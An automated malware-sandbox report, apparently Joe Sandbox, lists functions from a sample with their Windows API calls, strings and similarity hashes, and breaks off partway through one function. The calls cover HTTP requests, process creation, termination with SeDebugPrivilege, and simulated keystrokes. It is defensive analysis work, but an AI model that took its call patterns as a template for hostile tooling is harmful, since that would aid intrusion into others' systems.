Function 003BA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,003BA439), ref: 003BA377

Strings

CLASSNN, xrefs: 003BA119
REGEXPCLASS, xrefs: 003BA13C
INSTANCE, xrefs: 003BA285
TEXT, xrefs: 003BA2AE
CLASS, xrefs: 003BA0F6
NAME, xrefs: 003BA1A9

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 2e439f68fa390b3ddc7802046cc6b2865042b1020919e4e4deee9d3d1206e92a
Instruction ID: b2f44d562d12013f37647763c16515b41dc8d511752d04a60322e2c0f03abed0
Opcode Fuzzy Hash: 2e439f68fa390b3ddc7802046cc6b2865042b1020919e4e4deee9d3d1206e92a
Instruction Fuzzy Hash: 7F91D830A00E05ABDB4AEFA4C482BEDFBB4FF04308F54C519D959AB641DF316999CB91

Function 00362E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00362EAE

Part of subcall function 00361DB3: GetClientRect.USER32(?,?), ref: 00361DDC
Part of subcall function 00361DB3: GetWindowRect.USER32(?,?), ref: 00361E1D
Part of subcall function 00361DB3: ScreenToClient.USER32(?,?), ref: 00361E45

GetDC.USER32 ref: 0039CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0039CD45
SelectObject.GDI32(00000000,00000000), ref: 0039CD53
SelectObject.GDI32(00000000,00000000), ref: 0039CD68
ReleaseDC.USER32(?,00000000), ref: 0039CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0039CDFB

Strings

U, xrefs: 0039CCD0

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 4b9fe9aefeeadda315f910b0cc4fa64cf9d7c52278f56eca25b74c8f625a1221
Instruction ID: 5d835b087b54c05bd90f21f32c112e53b38f840d26886d731459ff26c5b70301
Opcode Fuzzy Hash: 4b9fe9aefeeadda315f910b0cc4fa64cf9d7c52278f56eca25b74c8f625a1221
Instruction Fuzzy Hash: 0B71D031900605DFCF239F64C884AAA7BB9FF49320F15927AED595A2AAC7318C41DF60

Function 003D1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D1A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003D1A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003D1ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003D1AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D1AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003D1B10
InternetCloseHandle.WININET(00000000), ref: 003D1B57

Part of subcall function 003D2483: GetLastError.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D2498
Part of subcall function 003D2483: SetEvent.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D24AD

Strings

, xrefs: 003D1B01

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 53c4a9b028f1bea7d5d25f9b2963faa6dbd0fec0cca92561975e85fe77d888c3
Instruction ID: 3c6c7a278c04b11905eefa6eea3639b0b315e8e75dd66b54c78fbd307499695b
Opcode Fuzzy Hash: 53c4a9b028f1bea7d5d25f9b2963faa6dbd0fec0cca92561975e85fe77d888c3
Instruction Fuzzy Hash: E5413DB2501219BFEB129F60DC85FBB7BACEB08354F004127FD059A281E7B49E449BA0

Function 003D8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,003EF910), ref: 003D8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003EF910), ref: 003D8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003D8ED6
SysFreeString.OLEAUT32(?), ref: 003D8F00

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 279c036fcccabd4663b2e4de3e35100f01436d9c3187a6f7e29342abfb6dcaf6
Instruction ID: e261311493107671eeb3c727b162029f0bb1fb4a8966abbc905c7bbbbdfe2f88
Opcode Fuzzy Hash: 279c036fcccabd4663b2e4de3e35100f01436d9c3187a6f7e29342abfb6dcaf6
Instruction Fuzzy Hash: B7F16872A00209EFCF16DF94D884EAEB7B9FF48314F11819AF905AB251DB31AE45CB50

Function 003DF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003DF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003DFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003DFA7C
CloseHandle.KERNEL32(?), ref: 003DFAAB
CloseHandle.KERNEL32(?), ref: 003DFB22

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 64acf25f0039d4cc20c89b5a01b54b6836989495f781e54d6b7d05c6db0e3b1d
Instruction ID: b3ddf490465bbf4c46deee1d52a7c8888b75ce806d351f920417eee7b0c6efc5
Opcode Fuzzy Hash: 64acf25f0039d4cc20c89b5a01b54b6836989495f781e54d6b7d05c6db0e3b1d
Instruction Fuzzy Hash: 0CE1A1326043409FC716EF24D891B6ABBE5AF85354F14856EF89A9F3A2CB30DC45CB52

Function 003C4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C3697,?), ref: 003C468B

Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C3697,?), ref: 003C46A4

Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32

lstrcmpiW.KERNEL32(?,?), ref: 003C4D40
_wcscmp.LIBCMT ref: 003C4D5A
MoveFileW.KERNEL32(?,?), ref: 003C4D75

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 4860282c96c2e9cc82b6189064afad8deec07f5f6bb4e0c4251b8560939ff783
Instruction ID: c518a42cdcab5a9d56a96c0dac2c18090ab6b936ae15b6982e32f8d4e2760f91
Opcode Fuzzy Hash: 4860282c96c2e9cc82b6189064afad8deec07f5f6bb4e0c4251b8560939ff783
Instruction Fuzzy Hash: 905165B20083859BC726EB60D895EDFB3ECAF85350F40492EF585D7152EF70A688C756

Function 003E8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003E86FF

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 3d5b3973efbb315cc1e2829bbfba29125807551af4db03e176f4e148184664b6
Instruction ID: 0524806be2f364ec5b5395a8147dd65dd199e8f0b018ec60b1b487f5f893ae3e
Opcode Fuzzy Hash: 3d5b3973efbb315cc1e2829bbfba29125807551af4db03e176f4e148184664b6
Instruction Fuzzy Hash: 0D51B530A002E4BFDF229F26CC85FAD7B68AB05310F614715FA59EA1E0CF71A980DB40

Function 00362B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0039C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0039C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0039C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0039C370
DestroyIcon.USER32(00000000), ref: 0039C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0039C39C
DestroyIcon.USER32(?), ref: 0039C3AB

Part of subcall function 003EA4AF: DeleteObject.GDI32(00000000), ref: 003EA4E8

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 6f626ad5321cce1e3dc8feec1b4b446415ca4b996d52a736e80e362d696e13c6
Instruction ID: 3bba8f2ecf74d22c9e3f017e1edc3b86fea46967909e6d64f232d77293b5ec6e
Opcode Fuzzy Hash: 6f626ad5321cce1e3dc8feec1b4b446415ca4b996d52a736e80e362d696e13c6
Instruction Fuzzy Hash: 14517C74610605AFDF22DF64CC85FAB3BB9EB08310F118628F9429B2D0D7B0AD90DB50

Function 003B966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003BA84C
Part of subcall function 003BA82C: GetCurrentThreadId.KERNEL32 ref: 003BA853
Part of subcall function 003BA82C: AttachThreadInput.USER32(00000000,?,003B9683,?,00000001), ref: 003BA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 003B968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003B96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003B96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 003B96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003B96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003B96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 003B96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003B96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003B96FB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: d385d4f59669eb905b94bdc3aba50691ce363c402c33170c0663b6c2ff2541e5
Instruction ID: 5d61e4cf4015083de972b247b9499f2ac73a87fb6daf043890d7de454b75d611
Opcode Fuzzy Hash: d385d4f59669eb905b94bdc3aba50691ce363c402c33170c0663b6c2ff2541e5
Instruction Fuzzy Hash: AD11CEB1910618BFF6226B60DC89FAA7F2DEB4C764F100525F344AF1E0C9F25C109AA4

Function 003B8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C), ref: 003B892A
HeapAlloc.KERNEL32(00000000), ref: 003B8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 003B8946
GetCurrentProcess.KERNEL32(?,00000000), ref: 003B894E
DuplicateHandle.KERNEL32(00000000), ref: 003B8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 003B8961
GetCurrentProcess.KERNEL32(?,00000000), ref: 003B8969
DuplicateHandle.KERNEL32(00000000), ref: 003B896C
CreateThread.KERNEL32(00000000,00000000,003B8992,00000000,00000000,00000000), ref: 003B8986

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 38b089c8c07d76e951b365c3b8c2d5931f3397ad917bd0b97bea4289f83c2a76
Instruction ID: cfb14c482e2fceb6f6a2920f2038ac54513626d741ee901c6d8e3c831c874592
Opcode Fuzzy Hash: 38b089c8c07d76e951b365c3b8c2d5931f3397ad917bd0b97bea4289f83c2a76
Instruction Fuzzy Hash: F401AC75240348FFE621ABA5DC89F673B6CEB89711F418521FA05DF1D1CAB09800CA20

Function 003D9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 003D9BA4, 003D9EC8
Not an Object type, xrefs: 003D9B7B

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 277c7e15a8cb27a106eb6d0c8148279afd4e8791e6dacce3906ba5c0903ae9e9
Instruction ID: 0855be69574a56336767982d699426c0ff42bf74c5f77b6e3b17c248ef952b76
Opcode Fuzzy Hash: 277c7e15a8cb27a106eb6d0c8148279afd4e8791e6dacce3906ba5c0903ae9e9
Instruction Fuzzy Hash: F4C19372A002199FDF11DF98E884BAEB7F9FB48314F15856BE905AB380E7709D45CB90

Function 003D975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 003B710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?,?,003B7455), ref: 003B7127
Part of subcall function 003B710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7142
Part of subcall function 003B710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7150
Part of subcall function 003B710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?), ref: 003B7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003D9806
_memset.LIBCMT ref: 003D9813
_memset.LIBCMT ref: 003D9956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003D9982
CoTaskMemFree.OLE32(?), ref: 003D998D

Strings

NULL Pointer assignment, xrefs: 003D99DB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: d5b7361f1cb5576fb337c5b7a65d65aa64e52aeb31839994075f5a9ac43eb5f5
Instruction ID: 0d10bd74bb95c825e84af7af6f581df7de1f77f251985e7d3ae3a9a38b988c40
Opcode Fuzzy Hash: d5b7361f1cb5576fb337c5b7a65d65aa64e52aeb31839994075f5a9ac43eb5f5
Instruction Fuzzy Hash: 64913B72D00229EBDB12DFA5DC45EDEBBB9EF08310F10815AF519AB291DB715A44CFA0

Function 003E6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003E6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 003E6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003E6E52
_wcscat.LIBCMT ref: 003E6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 003E6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 003E6EF2

Strings

SysListView32, xrefs: 003E6DF6

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 513bffd6ea81d389509d0cbdbfefa79cb07e558b69e1092bb897b7f639ee89b5
Instruction ID: cc72d41dd03978ca9261e90a77b88afcbed7ff1a9e3d4a25ed0f7abd1a59bfd1
Opcode Fuzzy Hash: 513bffd6ea81d389509d0cbdbfefa79cb07e558b69e1092bb897b7f639ee89b5
Instruction Fuzzy Hash: FE41A370A00398EFDB229F64CC86BEE77A8EF58390F11462AF584EB1D1D6719D848B50

Function 003DE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 003C3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 003C3C7A
Part of subcall function 003C3C55: Process32FirstW.KERNEL32(00000000,?), ref: 003C3C88
Part of subcall function 003C3C55: CloseHandle.KERNEL32(00000000), ref: 003C3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DE9A4
GetLastError.KERNEL32 ref: 003DE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 003DEA63
GetLastError.KERNEL32(00000000), ref: 003DEA6E
CloseHandle.KERNEL32(00000000), ref: 003DEAA3

Strings

SeDebugPrivilege, xrefs: 003DE9C2

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b2cdf2f3853cc9661da2b588cbb2dfce228e50019d7d4bda3e3d40891dc8eda3
Instruction ID: edd8972a6712500338d330b3111d2276c7d9c7db700a5cd1400d5a356d7814c0
Opcode Fuzzy Hash: b2cdf2f3853cc9661da2b588cbb2dfce228e50019d7d4bda3e3d40891dc8eda3
Instruction Fuzzy Hash: C9419A712002019FDB26EF14DCA6F6EBBA9AF45314F14841AF9069F3D2CBB4AD04CB91

Function 003C2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 003C3033

Strings

warning, xrefs: 003C301C
question, xrefs: 003C2FEC
info, xrefs: 003C2FD4
stop, xrefs: 003C3004
blank, xrefs: 003C2FB5

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: aa5714c8f740ec28707291eeefdceb3e7b004056aba4ff96bc762d2a41dfef14
Instruction ID: 7c5eb4ad7aaf2adc91d104f8d18e986a626e176537e8326807bd429d95cc6c6b
Opcode Fuzzy Hash: aa5714c8f740ec28707291eeefdceb3e7b004056aba4ff96bc762d2a41dfef14
Instruction Fuzzy Hash: C6115E32348356BED7176A14DC82FAB779CEF15360B20406EF901EA1C1DBB46F4047A9

Function 003C42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003C4312
LoadStringW.USER32(00000000), ref: 003C4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003C432F
